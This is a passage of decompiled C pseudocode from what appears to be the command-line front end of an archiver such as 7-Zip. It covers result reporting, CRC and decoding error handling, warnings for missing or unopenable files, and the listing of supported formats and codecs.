						 *(_t1079 - 4) = 4;
						 *(_t1079 - 0x130) = _t1065;
						if(_t1065 != _t1073) {
							 *((intOrPtr*)( *_t1065 + 4))(_t1065);
						}
						 *(_t1079 - 4) = 7;
						_t503 = E0041741C(_t1065); // executed
						__eflags = _t503 - _t1073;
						if(_t503 != _t1073) {
							 *(_t1079 - 0x14) = _t503;
							L0046B8F4(_t1079 - 0x14, 0x47d368);
						}
						_t504 = L0040FE22(_t1079 - 0x2b8);
						__eflags =  *(_t1065 + 0x10) - _t1073;
						 *(_t1079 - 0xd) = _t504;
						if( *(_t1065 + 0x10) == _t1073) {
							__eflags = _t504;
							if(_t504 != 0) {
								L21:
								_t812 =  *0x48aad4; // 0x48ab10
								 *(_t1079 - 0x14) = _t812;
								L0046B8F4(_t1079 - 0x14, 0x47d358);
							} else {
								__eflags =  *((intOrPtr*)(_t1079 - 0x2b8)) - 6;
								if( *((intOrPtr*)(_t1079 - 0x2b8)) == 6) {
									goto L21;
								} else {
									_t815 = L0040FE46(_t1079 - 0x2b8);
									__eflags = _t815;
									if(_t815 != 0) {
										goto L21;
									}
								}
							}
						}
						_push(4);
						L157();
						 *((intOrPtr*)(_t1079 - 0x60)) = 0x47a668;
						_push(_t1079 - 0x60);
						_push(_t1079 - 0x170);
						 *(_t1079 - 4) = 8;
						_t507 = L004176BE(_t1065);
						__eflags = _t507;
						if(_t507 == 0) {
							_t809 =  *0x48aad8; // 0x48aaf4
							 *(_t1079 - 0x14) = _t809;
							L0046B8F4(_t1079 - 0x14, 0x47d358);
						}
						__eflags =  *((intOrPtr*)(_t1079 - 0x2b8)) - 8;
						if( *((intOrPtr*)(_t1079 - 0x2b8)) != 8) {
							__eflags =  *((intOrPtr*)(_t1079 - 0x2b8)) - 7;
							if( *((intOrPtr*)(_t1079 - 0x2b8)) != 7) {
								L61:
								__eflags =  *(_t1079 - 0xd);
								if( *(_t1079 - 0xd) != 0) {
									_push(0x48);
									_t508 = L004079F2();
									 *(_t1079 - 0x14) = _t508;
									__eflags = _t508 - _t1073;
									 *(_t1079 - 4) = 0xd;
									if(_t508 == _t1073) {
										_t1065 = 0;
										__eflags = 0;
									} else {
										_t1065 = E004053AD(_t508);
									}
									__eflags = _t1065;
									 *(_t1079 - 4) = 8;
									 *(_t1079 - 0x30) = _t1065;
									if(_t1065 != 0) {
										 *((intOrPtr*)( *_t1065 + 4))(_t1065);
									}
									 *((intOrPtr*)(_t1065 + 0x40)) = _t829;
									 *((char*)(_t1065 + 0xc)) =  *((intOrPtr*)(_t1079 - 0x2a8));
									_t330 = _t1065 + 0x10; // 0x10
									 *(_t1079 - 4) = 0xe;
									E00401E26(_t330, _t1079 - 0x2a4);
									 *((intOrPtr*)(_t1065 + 0x20)) = 0;
									 *(_t1065 + 0x28) = 0;
									 *(_t1065 + 0x30) = 0;
									 *((intOrPtr*)(_t1065 + 0x38)) = 0;
									 *(_t1065 + 0x24) = 0;
									 *(_t1065 + 0x2c) = 0;
									 *(_t1065 + 0x34) = 0;
									 *((intOrPtr*)(_t1065 + 0x3c)) = 0;
									L0040347F(_t1079 - 0xc4);
									 *((char*)(_t1079 - 0xbc)) =  *((intOrPtr*)(_t1079 - 0x2a8));
									 *(_t1079 - 4) = 0xf;
									 *((intOrPtr*)(_t1079 - 0xc0)) = _t829;
									E00401E26(_t1079 - 0xb8, _t1079 - 0x2a4);
									E00404B67(_t1079 - 0xf4);
									_t517 =  *((intOrPtr*)(_t1079 - 0x2d3));
									 *(_t1079 - 4) = 0x10;
									 *((char*)(_t1079 - 0xf4)) = _t517;
									 *((char*)(_t1079 - 0xf3)) = _t517;
									_t518 = L0040FE34(_t1079 - 0x2b8);
									__eflags =  *((intOrPtr*)(_t1079 - 0x2b8)) - 3;
									 *(_t1079 - 0xec) = _t518;
									 *((char*)(_t1079 - 0xf1)) = _t518 & 0xffffff00 |  *((intOrPtr*)(_t1079 - 0x2b8)) == 0x00000003;
									 *((intOrPtr*)(_t1079 - 0xe8)) =  *((intOrPtr*)(_t1079 - 0x288));
									E00401E26(_t1079 - 0xe4, _t1079 - 0x294);
									 *((char*)(_t1079 - 0xf2)) =  *((intOrPtr*)(_t1079 - 0x2d0));
									 *((char*)(_t1079 - 0xf0)) =  *((intOrPtr*)(_t1079 - 0x297));
									E0040862D();
									_push(_t1079 - 0x25c);
									E00405BBA(_t1079 - 0xd8);
									 *((intOrPtr*)(_t1079 - 0x2c)) = 0;
									 *(_t1079 - 0x28) = 0;
									 *((intOrPtr*)(_t1079 - 0x24)) = 0;
									E00401E9A(_t1079 - 0x2c, 3);
									_push(_t1079 - 0xac);
									_push(_t1079 - 0x2c);
									_push(_t1065);
									_push(_t1079 - 0xc4);
									_push(_t1079 - 0xf4);
									_push( *((intOrPtr*)( *((intOrPtr*)(_t1079 - 0x2c0)))) + 0xc);
									 *(_t1079 - 4) = 0x11;
									_push(_t1079 - 0x270);
									_push(_t1079 - 0x284);
									_t534 = E00415D31( *(_t1079 - 0x20), _t1079 - 0x60, __eflags); // executed
									__eflags =  *(_t1079 - 0x28);
									 *(_t1079 - 0x18) = _t534;
									if( *(_t1079 - 0x28) != 0) {
										_push( *((intOrPtr*)(_t1079 - 0x2c)));
										L00407CEC(E00407CD5(L00407CC0(_t829, 0x407ccd), "Error: "));
										__eflags =  *(_t1079 - 0x18);
										if( *(_t1079 - 0x18) == 0) {
											 *(_t1079 - 0x18) = 0x80004005;
										}
									}
									L00407CC0(_t829, 0x407ccd);
									_t536 =  *(_t1065 + 0x24);
									_t861 =  *((intOrPtr*)(_t1065 + 0x20));
									__eflags =  *(_t1065 + 0x24);
									if(__eflags > 0) {
										L121:
										L00407CC0(L00407DED(E00407CD5(_t829, "Archives: "), __eflags, _t861, _t536), 0x407ccd);
									} else {
										__eflags = _t861 - 1;
										if(__eflags > 0) {
											goto L121;
										}
									}
									__eflags =  *(_t1065 + 0x28) |  *(_t1065 + 0x2c);
									if(( *(_t1065 + 0x28) |  *(_t1065 + 0x2c)) != 0) {
										L136:
										__eflags =  *(_t1065 + 0x24);
										if( *(_t1065 + 0x24) > 0) {
											L138:
											L00407CC0(_t829, 0x407ccd);
											_t543 =  *(_t1065 + 0x28);
											_t866 =  *(_t1065 + 0x2c);
											__eflags =  *(_t1065 + 0x28) |  *(_t1065 + 0x2c);
											if(__eflags != 0) {
												L00407CC0(L00407DED(E00407CD5(_t829, "Archive Errors: "), __eflags, _t543, _t866), 0x407ccd);
											}
											_t544 =  *(_t1065 + 0x30);
											_t867 =  *(_t1065 + 0x34);
											__eflags =  *(_t1065 + 0x30) |  *(_t1065 + 0x34);
											if(__eflags != 0) {
												L00407CC0(L00407DED(E00407CD5(_t829, "Sub items Errors: "), __eflags, _t544, _t867), 0x407ccd);
											}
										} else {
											__eflags =  *((intOrPtr*)(_t1065 + 0x20)) - 1;
											if( *((intOrPtr*)(_t1065 + 0x20)) > 1) {
												goto L138;
											}
										}
										__eflags =  *(_t1079 - 0x18);
										if( *(_t1079 - 0x18) != 0) {
											 *(_t1079 - 0x14) =  *(_t1079 - 0x18);
											L0046B8F4(_t1079 - 0x14, 0x47d368);
										}
										E00407A18( *((intOrPtr*)(_t1079 - 0x2c)));
										 *(_t1079 - 4) = 0xf;
										E00405489(_t1079 - 0xf4);
										E00407A18( *((intOrPtr*)(_t1079 - 0xb8)));
										__eflags = _t1065;
										 *(_t1079 - 4) = 8;
										if(_t1065 != 0) {
											 *((intOrPtr*)( *_t1065 + 8))(_t1065);
										}
										 *(_t1079 - 4) = 7;
										E00408604(_t1079 - 0x60);
										_t549 =  *(_t1079 - 0x20);
										 *(_t1079 - 4) = 4;
										__eflags = _t549;
										if(_t549 != 0) {
											 *((intOrPtr*)( *_t549 + 8))(_t549);
										}
										 *(_t1079 - 4) = 3;
										L00406E46(_t1079 - 0x7c, _t1065);
										 *(_t1079 - 4) =  *(_t1079 - 4) & 0x00000000;
										E00405233(_t1079 - 0x2d8, __eflags);
										 *((intOrPtr*)(_t1079 - 0x4c)) = 0x47a420;
										 *(_t1079 - 4) = 0x12;
										goto L154;
									} else {
										__eflags =  *(_t1065 + 0x30) |  *(_t1065 + 0x34);
										if(( *(_t1065 + 0x30) |  *(_t1065 + 0x34)) != 0) {
											goto L136;
										} else {
											__eflags =  *(_t1079 - 0x18);
											if( *(_t1079 - 0x18) != 0) {
												 *(_t1079 - 0x14) =  *(_t1079 - 0x18);
												L0046B8F4(_t1079 - 0x14, 0x47d368);
											}
											_t569 =  *(_t1079 - 0x94);
											__eflags = _t569 |  *(_t1079 - 0x90);
											if(__eflags != 0) {
												L00407CC0(L00407DED(E00407CD5(_t829, "Folders: "), __eflags, _t569,  *(_t1079 - 0x90)), 0x407ccd);
												_t569 =  *(_t1079 - 0x94);
											}
											__eflags =  *((intOrPtr*)(_t1079 - 0x8c)) - 1;
											if(__eflags != 0) {
												L131:
												_t571 = L00407DED(E00407CD5(_t829, "Files: "), __eflags,  *((intOrPtr*)(_t1079 - 0x8c)),  *(_t1079 - 0x88)); // executed
												L00407CC0(_t571, 0x407ccd);
											} else {
												__eflags =  *(_t1079 - 0x88);
												if(__eflags != 0) {
													goto L131;
												} else {
													__eflags = _t569 |  *(_t1079 - 0x90);
													if(__eflags != 0) {
														goto L131;
													}
												}
											}
											_t574 = L00407DED(E00407CD5(_t829, "Size:       "), __eflags,  *((intOrPtr*)(_t1079 - 0xa4)),  *((intOrPtr*)(_t1079 - 0xa0))); // executed
											_t577 = L00407DED(E00407CD5(L00407CC0(_t574, 0x407ccd), "Compressed: "), __eflags,  *((intOrPtr*)(_t1079 - 0x9c)),  *((intOrPtr*)(_t1079 - 0x98))); // executed
											L00407CC0(_t577, 0x407ccd);
											__eflags =  *((char*)(_t1079 - 0x297));
											if( *((char*)(_t1079 - 0x297)) != 0) {
												L00407759( *((intOrPtr*)(_t1079 - 0x84)), _t1079 - 0x12c);
												L00407CC0(E00407CD5(E00407CD5(_t829, "CRC: "), _t1079 - 0x12c), 0x407ccd);
											}
											E00407A18( *((intOrPtr*)(_t1079 - 0x2c)));
											 *(_t1079 - 4) = 0xf;
											E00405489(_t1079 - 0xf4);
											E00407A18( *((intOrPtr*)(_t1079 - 0xb8)));
											__eflags = _t1065;
											 *(_t1079 - 4) = 8;
											if(_t1065 != 0) {
												 *((intOrPtr*)( *_t1065 + 8))(_t1065);
											}
											goto L107;
										}
									}
									goto L110;
								} else {
									__eflags =  *((intOrPtr*)(_t1079 - 0x2b8)) - 6;
									if(__eflags == 0) {
										_push(_t1079 - 0x34);
										_push(_t1079 - 0x2a4);
										_push(_t1079 - 0x2a8);
										 *(_t1079 - 0x34) = _t1073;
										_push( *((intOrPtr*)(_t1079 - 0x298)));
										 *(_t1079 - 0x30) = _t1073;
										_push( *((intOrPtr*)(_t1079 - 0x2d1)));
										_t918 = _t1065;
										_push( *((intOrPtr*)( *((intOrPtr*)(_t1079 - 0x2c0)))) + 0xc);
										_push(_t1079 - 0x270);
										_push(_t1079 - 0x284);
										_push( *((intOrPtr*)(_t1079 - 0x2d3)));
										_t614 = E0040279E(_t918, _t1079 - 0x60, __eflags);
										__eflags =  *(_t1079 - 0x30) - _t1073;
										if(__eflags > 0) {
											L151:
											L00407DED(E00407CD5(L00407CC0(0x490ab8, 0x407ccd), "Errors: "), __eflags,  *(_t1079 - 0x34),  *(_t1079 - 0x30));
											 *(_t1079 - 4) = 7;
											E00408604(_t1079 - 0x60);
											__eflags = _t1065 - _t1073;
											 *(_t1079 - 4) = 4;
											if(_t1065 != _t1073) {
												 *((intOrPtr*)( *_t1065 + 8))(_t1065);
											}
											 *(_t1079 - 4) = 3;
											L00406E46(_t1079 - 0x7c, _t1065);
											_t471 = _t1079 - 4;
											 *_t471 =  *(_t1079 - 4) & 0x00000000;
											__eflags =  *_t471;
											E00405233(_t1079 - 0x2d8,  *_t471);
											 *((intOrPtr*)(_t1079 - 0x4c)) = 0x47a420;
											 *(_t1079 - 4) = 0x13;
											goto L154;
										} else {
											__eflags =  *(_t1079 - 0x34) - _t1073;
											if(__eflags <= 0) {
												__eflags = _t614 - _t1073;
												if(_t614 == _t1073) {
													goto L107;
												} else {
													 *(_t1079 - 0x14) = _t614;
													L0046B8F4(_t1079 - 0x14, 0x47d368);
													_t625 = _t918;
													__eflags = 0;
													 *((intOrPtr*)(_t625 + 4)) = 0;
													 *((intOrPtr*)(_t625 + 8)) = 0;
													 *((intOrPtr*)(_t625 + 0xc)) = 0;
													 *((intOrPtr*)(_t625 + 0x10)) =  *((intOrPtr*)(_t1082 + 4));
													 *_t625 = 0x47a670;
													return _t625;
												}
											} else {
												goto L151;
											}
										}
									} else {
										_t626 = L0040FE46(_t1079 - 0x2b8);
										__eflags = _t626;
										if(_t626 == 0) {
											E0040519B(_t829);
											goto L107;
										} else {
											__eflags =  *((char*)(_t1079 - 0x1c0));
											if( *((char*)(_t1079 - 0x1c0)) != 0) {
												__eflags =  *((intOrPtr*)(_t1079 - 0x1b8)) - _t1073;
												if( *((intOrPtr*)(_t1079 - 0x1b8)) == _t1073) {
													L00403593(_t1079 - 0x1bc,  *0x48aadc);
												}
											}
											L0040347F(_t1079 - 0x148);
											__eflags =  *((char*)(_t1079 - 0x2a8));
											 *(_t1079 - 4) = 0x14;
											 *((intOrPtr*)(_t1079 - 0x144)) = _t829;
											if( *((char*)(_t1079 - 0x2a8)) == 0) {
												L70:
												_t179 = _t1079 - 0xd;
												 *_t179 =  *(_t1079 - 0xd) & 0x00000000;
												__eflags =  *_t179;
											} else {
												__eflags =  *((intOrPtr*)(_t1079 - 0x2a0)) - _t1073;
												if( *((intOrPtr*)(_t1079 - 0x2a0)) == _t1073) {
													goto L70;
												} else {
													 *(_t1079 - 0xd) = 1;
												}
											}
											 *((char*)(_t1079 - 0x140)) =  *(_t1079 - 0xd);
											E00401E26(_t1079 - 0x13c, _t1079 - 0x2a4);
											E0040502A(_t1079 - 0x378);
											__eflags =  *((char*)(_t1079 - 0x2a8));
											 *((char*)(_t1079 - 0x340)) =  *((intOrPtr*)(_t1079 - 0x164));
											 *(_t1079 - 4) = 0x15;
											 *((char*)(_t1079 - 0x33e)) =  *(_t1079 - 0xd);
											if( *((char*)(_t1079 - 0x2a8)) == 0) {
												L74:
												_t194 = _t1079 - 0x330;
												 *_t194 =  *(_t1079 - 0x330) & 0x00000000;
												__eflags =  *_t194;
											} else {
												__eflags =  *((intOrPtr*)(_t1079 - 0x2a0)) - _t1073;
												if( *((intOrPtr*)(_t1079 - 0x2a0)) != _t1073) {
													goto L74;
												} else {
													 *(_t1079 - 0x330) = 1;
												}
											}
											E00401E26(_t1079 - 0x33c, _t1079 - 0x2a4);
											 *((char*)(_t1079 - 0x33f)) =  *((intOrPtr*)(_t1079 - 0x1a0));
											E00405172(_t1079 - 0x378, _t829);
											E00404BAF(_t1079 - 0x11c);
											_push(_t1079 - 0x2b4);
											_push(_t1079 - 0x60);
											_push(_t1065);
											 *(_t1079 - 4) = 0x16;
											_t642 = E00419B56(_t1079 - 0x248, _t1049);
											__eflags = _t642;
											if(_t642 == 0) {
												_t725 =  *0x48aad8; // 0x48aaf4
												 *(_t1079 - 0x14) = _t725;
												L0046B8F4(_t1079 - 0x14, 0x47d358);
											}
											_t1057 = _t1079 - 0x2cc;
											_push(_t1079 - 0x378);
											_push(_t1079 - 0x148);
											_push(_t1079 - 0x11c);
											_push(_t1079 - 0x248);
											_t647 = E00419FDE(_t1065, _t1079 - 0x2cc);
											 *(_t1079 - 0x18) =  *(_t1079 - 0x18) & 0x00000000;
											__eflags =  *(_t1079 - 0x2fc);
											 *(_t1079 - 0x14) = _t647;
											_t1077 = 0x407ccd;
											if( *(_t1079 - 0x2fc) > 0) {
												L00407CC0(_t829, 0x407ccd);
												L00407CC0(L00407CC0(E00407CD5(_t829, "WARNINGS for files:"), 0x407ccd), 0x407ccd);
												_t706 =  *(_t1079 - 0x2fc);
												_t1069 = 0;
												__eflags = _t706;
												 *(_t1079 - 0x1c) = _t706;
												if(__eflags > 0) {
													do {
														_push(" : ");
														E00407CD5(L00407CEC(_t829),  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t1079 - 0x2f8)) + _t1069 * 4)))));
														_t1057 =  *((intOrPtr*)( *((intOrPtr*)(_t1079 - 0x2e4)) + _t1069 * 4));
														_t720 = E00404B09(_t1079 - 0x2c,  *((intOrPtr*)( *((intOrPtr*)(_t1079 - 0x2e4)) + _t1069 * 4)));
														_push(0x407ccd);
														 *(_t1079 - 4) = 0x17;
														L00407CC0(L00407CEC(_t829),  *_t720);
														 *(_t1079 - 4) = 0x16;
														E00407A18( *((intOrPtr*)(_t1079 - 0x2c)));
														_t1069 = _t1069 + 1;
														__eflags = _t1069 -  *(_t1079 - 0x1c);
													} while (__eflags < 0);
												}
												L00407CC0(E00407CD5(_t829, "----------------"), _t1077);
												E00407CD5(L00407DC6(E00407CD5(_t829, "WARNING: Cannot find "), _t1057, __eflags,  *(_t1079 - 0x1c)), " file");
												_t1070 = 1;
												__eflags =  *(_t1079 - 0x1c) - _t1070;
												if( *(_t1079 - 0x1c) > _t1070) {
													E00407CD5(_t829, "s");
												}
												L00407CC0(_t829, _t1077);
												 *(_t1079 - 0x18) = _t1070;
												_t1065 =  *(_t1079 - 0x20);
											}
											__eflags =  *(_t1079 - 0x14);
											if( *(_t1079 - 0x14) != 0) {
												_t1065 = 0;
												 *((intOrPtr*)(_t1079 - 0x38)) = 0;
												 *(_t1079 - 0x34) = 0;
												 *(_t1079 - 0x30) = 0;
												E00401E9A(_t1079 - 0x38, 3);
												__eflags =  *(_t1079 - 0xfc);
												 *(_t1079 - 4) = 0x18;
												_t1077 = "\n";
												if(__eflags != 0) {
													E00405529(_t1079 - 0x38, _t1057, __eflags, _t1079 - 0x100);
													L004035F2(_t1079 - 0x38, _t1057, _t1077);
												}
												__eflags =  *((intOrPtr*)(_t1079 - 0x114)) - _t1065;
												if(__eflags != 0) {
													E00405529(_t1079 - 0x38, _t1057, __eflags, _t1079 - 0x118);
													L004035F2(_t1079 - 0x38, _t1057, _t1077);
												}
												__eflags =  *((intOrPtr*)(_t1079 - 0x108)) - _t1065;
												if(__eflags != 0) {
													E00405529(_t1079 - 0x38, _t1057, __eflags, _t1079 - 0x10c);
													L004035F2(_t1079 - 0x38, _t1057, _t1077);
												}
												_t1057 =  *((intOrPtr*)(_t1079 - 0x11c));
												__eflags =  *((intOrPtr*)(_t1079 - 0x11c)) - _t1065;
												if( *((intOrPtr*)(_t1079 - 0x11c)) != _t1065) {
													_t689 = E00404B09(_t1079 - 0x2c, _t1057);
													 *(_t1079 - 4) = 0x19;
													E00405529(_t1079 - 0x38, _t1057, __eflags, _t689);
													 *(_t1079 - 4) = 0x18;
													E00407A18( *((intOrPtr*)(_t1079 - 0x2c)));
													L004035F2(_t1079 - 0x38, _t1057, _t1077);
												}
												__eflags =  *(_t1079 - 0x34) - _t1065;
												if( *(_t1079 - 0x34) != _t1065) {
													_push( *((intOrPtr*)(_t1079 - 0x38)));
													_push(L"\nError:\n");
													L00407CEC(L00407CEC(_t829));
												}
												L0046B8F4(_t1079 - 0x14, 0x47d368);
											}
											_t648 =  *(_t1079 - 0x324);
											__eflags = _t648;
											 *(_t1079 - 0x1c) = _t648;
											if(_t648 != 0) {
												L00407CC0(_t829, _t1077);
												L00407CC0(L00407CC0(E00407CD5(_t829, "WARNINGS for files:"), _t1077), _t1077);
												_t1067 = 0;
												__eflags =  *(_t1079 - 0x1c);
												if(__eflags > 0) {
													do {
														_push(" : ");
														E00407CD5(L00407CEC(_t829),  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t1079 - 0x320)) + _t1067 * 4)))));
														_t1057 =  *((intOrPtr*)( *((intOrPtr*)(_t1079 - 0x30c)) + _t1067 * 4));
														_t676 = E00404B09(_t1079 - 0x128,  *((intOrPtr*)( *((intOrPtr*)(_t1079 - 0x30c)) + _t1067 * 4)));
														_push(_t1077);
														 *(_t1079 - 4) = 0x1a;
														L00407CC0(L00407CEC(_t829),  *_t676);
														 *(_t1079 - 4) = 0x16;
														E00407A18( *((intOrPtr*)(_t1079 - 0x128)));
														_t1067 = _t1067 + 1;
														__eflags = _t1067 -  *(_t1079 - 0x1c);
													} while (__eflags < 0);
												}
												L00407CC0(E00407CD5(_t829, "----------------"), _t1077);
												E00407CD5(L00407DC6(E00407CD5(_t829, "WARNING: Cannot open "), _t1057, __eflags,  *(_t1079 - 0x1c)), " file");
												_t1068 = 1;
												__eflags =  *(_t1079 - 0x1c) - _t1068;
												if(__eflags > 0) {
													E00407CD5(_t829, "s");
												}
												L00407CC0(_t829, _t1077);
												 *(_t1079 - 0x18) = _t1068;
												_t1065 =  *(_t1079 - 0x20);
											} else {
												__eflags =  *(_t1079 - 0x2fc) - _t648;
												if(__eflags == 0) {
													L00407CC0(E00407CD5(_t829,  *0x48aacc), _t1077);
												}
											}
											 *(_t1079 - 4) = 0x15;
											E004054DE(_t1079 - 0x11c);
											 *(_t1079 - 4) = 0x14;
											E004050D8(_t1079 - 0x378, __eflags);
											E00407A18( *((intOrPtr*)(_t1079 - 0x13c)));
											 *(_t1079 - 4) = 7;
											E00408604(_t1079 - 0x60);
											__eflags = _t1065;
											 *(_t1079 - 4) = 4;
											if(_t1065 != 0) {
												 *((intOrPtr*)( *_t1065 + 8))(_t1065);
											}
											 *(_t1079 - 4) = 3;
											L00406E46(_t1079 - 0x7c, _t1065);
											 *(_t1079 - 4) =  *(_t1079 - 4) & 0x00000000;
											E00405233(_t1079 - 0x2d8, __eflags);
											 *((intOrPtr*)(_t1079 - 0x4c)) = 0x47a420;
											 *(_t1079 - 4) = 0x1b;
											E0040862D();
											 *(_t1079 - 4) =  *(_t1079 - 4) | 0xffffffff;
											E00408604(_t1079 - 0x4c);
											_t554 =  *(_t1079 - 0x18);
										}
										goto L110;
									}
								}
							} else {
								_t729 = E0040807A(L"CRC");
								_t133 = _t829 + 4; // 0x48de00
								_t996 =  *_t133;
								_t1049 =  *((intOrPtr*)(_t1079 - 0x160));
								_push( *((intOrPtr*)(_t1079 - 0x158)));
								__eflags = _t729 - _t1073;
								_push( *((intOrPtr*)(_t1079 - 0x15c)));
								if(__eflags != 0) {
									L55:
									_t730 = E004012BB(_t996, _t1049, __eflags);
									__eflags = _t730 - _t1073;
									if(_t730 == _t1073) {
										goto L107;
									} else {
										__eflags = _t730 - 1;
										if(_t730 != 1) {
											 *(_t1079 - 0x14) = _t730;
											L0046B8F4(_t1079 - 0x14, 0x47d368);
											goto L61;
										} else {
											E00407CD5(_t829, "\nDecoding Error\n");
											 *(_t1079 - 4) = 7;
											E00408604(_t1079 - 0x60);
											__eflags = _t1065 - _t1073;
											 *(_t1079 - 4) = 4;
											if(_t1065 != _t1073) {
												 *((intOrPtr*)( *_t1065 + 8))(_t1065);
											}
											 *(_t1079 - 4) = 3;
											L00406E46(_t1079 - 0x7c, _t1065);
											 *(_t1079 - 4) =  *(_t1079 - 4) & 0x00000000;
											E00405233(_t1079 - 0x2d8, __eflags);
											 *((intOrPtr*)(_t1079 - 0x4c)) = 0x47a420;
											 *(_t1079 - 4) = 0xc;
											L154:
											E0040862D();
											 *(_t1079 - 4) =  *(_t1079 - 4) | 0xffffffff;
											E00408604(_t1079 - 0x4c);
											_t554 = 2;
											goto L110;
										}
									}
								} else {
									_t739 = E00401679(_t996, _t1049, __eflags);
									__eflags = _t739 - _t1073;
									if(_t739 == _t1073) {
										L107:
										 *(_t1079 - 4) = 7;
										E00408604(_t1079 - 0x60);
										_t583 =  *(_t1079 - 0x20);
										 *(_t1079 - 4) = 4;
										__eflags = _t583;
										if(_t583 != 0) {
											 *((intOrPtr*)( *_t583 + 8))(_t583);
										}
										 *(_t1079 - 4) = 3;
										L00406E46(_t1079 - 0x7c, _t1065);
										 *(_t1079 - 4) =  *(_t1079 - 4) & 0x00000000;
										E00405233(_t1079 - 0x2d8, __eflags);
										 *((intOrPtr*)(_t1079 - 0x4c)) = 0x47a420;
										 *(_t1079 - 4) = 0x1c;
										E0040862D();
										 *(_t1079 - 4) =  *(_t1079 - 4) | 0xffffffff;
										E00408604(_t1079 - 0x4c);
										_t554 = 0;
										__eflags = 0;
										goto L110;
									} else {
										__eflags = _t739 - 1;
										if(__eflags != 0) {
											 *(_t1079 - 0x14) = _t739;
											L0046B8F4(_t1079 - 0x14, 0x47d368);
											goto L55;
										} else {
											E00407CD5(_t829, "\nCRC Error\n");
											 *(_t1079 - 4) = 7;
											E00408604(_t1079 - 0x60);
											__eflags = _t1065 - _t1073;
											 *(_t1079 - 4) = 4;
											if(_t1065 != _t1073) {
												 *((intOrPtr*)( *_t1065 + 8))(_t1065);
											}
											 *(_t1079 - 4) = 3;
											L00406E46(_t1079 - 0x7c, _t1065);
											_t143 = _t1079 - 4;
											 *_t143 =  *(_t1079 - 4) & 0x00000000;
											__eflags =  *_t143;
											E00405233(_t1079 - 0x2d8,  *_t143);
											 *((intOrPtr*)(_t1079 - 0x4c)) = 0x47a420;
											 *(_t1079 - 4) = 0xb;
											_t1073 = 2;
											goto L53;
										}
									}
								}
							}
						} else {
							L00407CC0(E00407CD5(L00407CC0(_t829, 0x407ccd), "Formats:"), 0x407ccd);
							_t1071 =  *(_t1065 + 0x10);
							 *(_t1079 - 0x1c) =  *(_t1079 - 0x1c) & 0x00000000;
							__eflags =  *(_t1065 + 0x10);
							if( *(_t1065 + 0x10) > 0) {
								do {
									_t1071 =  *( *((intOrPtr*)( *(_t1079 - 0x20) + 0x14)) +  *(_t1079 - 0x1c) * 4);
									E00407CD5(_t829, "  ");
									_t764 = L00407DAD(_t829, 0x20);
									__eflags =  *_t1071;
									_t769 = L00407DAD(_t829, ((_t764 & 0xffffff00 |  *_t1071 == 0x00000000) - 0x00000001 & 0x00000023) + 0x20);
									__eflags =  *((char*)(_t1071 + 0x38));
									L00407DAD(_t829, ((_t769 & 0xffffff00 |  *((char*)(_t1071 + 0x38)) == 0x00000000) - 0x00000001 & 0x0000002b) + 0x20);
									E00407CD5(_t829, "  ");
									_t1059 = _t1071 + 0xc;
									E00405208(_t829, _t1071 + 0xc, 6);
									E00407CD5(_t829, "  ");
									 *((intOrPtr*)(_t1079 - 0x2c)) = 0;
									 *(_t1079 - 0x28) = 0;
									 *((intOrPtr*)(_t1079 - 0x24)) = 0;
									E00401E9A(_t1079 - 0x2c, 3);
									 *(_t1079 - 0x18) =  *(_t1079 - 0x18) & 0x00000000;
									__eflags =  *(_t1071 + 0x20);
									 *(_t1079 - 4) = 9;
									if(__eflags > 0) {
										do {
											 *(_t1079 - 0x30) =  *( *((intOrPtr*)(_t1071 + 0x24)) +  *(_t1079 - 0x18) * 4);
											E00405529(_t1079 - 0x2c, _t1059, __eflags,  *( *((intOrPtr*)(_t1071 + 0x24)) +  *(_t1079 - 0x18) * 4));
											__eflags =  *( *(_t1079 - 0x30) + 0x10);
											if(__eflags != 0) {
												L004035F2(_t1079 - 0x2c, _t1059, L" (");
												__eflags =  *(_t1079 - 0x30) + 0xc;
												E00405529(_t1079 - 0x2c, _t1059, __eflags,  *(_t1079 - 0x30) + 0xc);
												E004054FE(_t1079 - 0x2c, _t1059, __eflags, 0x29);
											}
											E004054FE(_t1079 - 0x2c, _t1059, __eflags, 0x20);
											 *(_t1079 - 0x18) =  *(_t1079 - 0x18) + 1;
											__eflags =  *(_t1079 - 0x18) -  *(_t1071 + 0x20);
										} while (__eflags < 0);
									}
									E00405208(_t829, _t1079 - 0x2c, 0xe);
									E00407CD5(_t829, "  ");
									 *(_t1079 - 0x18) =  *(_t1079 - 0x18) & 0x00000000;
									__eflags =  *(_t1071 + 0x30);
									if( *(_t1071 + 0x30) > 0) {
										do {
											_t786 =  *((intOrPtr*)( *((intOrPtr*)(_t1071 + 0x34)) +  *(_t1079 - 0x18)));
											__eflags = _t786 - 0x20;
											 *(_t1079 - 0x14) = _t786;
											if(_t786 <= 0x20) {
												L34:
												_t787 = _t786 >> 4;
												__eflags = _t787 - 0xa;
												_t788 = _t787 & 0x000000ff;
												if(_t787 >= 0xa) {
													_t789 = _t788 + 0x37;
													__eflags = _t788 + 0x37;
												} else {
													_t789 = _t788 + 0x30;
												}
												L00407DAD(_t829, _t789);
												_t792 =  *(_t1079 - 0x14) & 0x0000000f;
												__eflags = _t792 - 0xa;
												_t793 = _t792 & 0x000000ff;
												if(_t792 >= 0xa) {
													_t794 = _t793 + 0x37;
													__eflags = _t794;
												} else {
													_t794 = _t793 + 0x30;
												}
												_push(_t794);
											} else {
												__eflags = _t786 - 0x80;
												if(_t786 >= 0x80) {
													goto L34;
												} else {
													_push( *(_t1079 - 0x14));
												}
											}
											L00407DAD(_t829);
											L00407DAD(_t829, 0x20);
											 *(_t1079 - 0x18) =  *(_t1079 - 0x18) + 1;
											__eflags =  *(_t1079 - 0x18) -  *(_t1071 + 0x30);
										} while ( *(_t1079 - 0x18) <  *(_t1071 + 0x30));
									}
									L00407CC0(_t829, 0x407ccd);
									 *(_t1079 - 4) = 8;
									E00407A18( *((intOrPtr*)(_t1079 - 0x2c)));
									 *(_t1079 - 0x1c) =  *(_t1079 - 0x1c) + 1;
									_t784 =  *(_t1079 - 0x20);
									__eflags =  *(_t1079 - 0x1c) -  *((intOrPtr*)(_t784 + 0x10));
								} while ( *(_t1079 - 0x1c) <  *((intOrPtr*)(_t784 + 0x10)));
							}
							L00407CC0(E00407CD5(L00407CC0(_t829, 0x407ccd), "Codecs:"), 0x407ccd);
							 *(_t1079 - 4) = 7;
							E00408604(_t1079 - 0x60);
							_t757 =  *(_t1079 - 0x20);
							 *(_t1079 - 4) = 4;
							__eflags = _t757;
							if(_t757 != 0) {
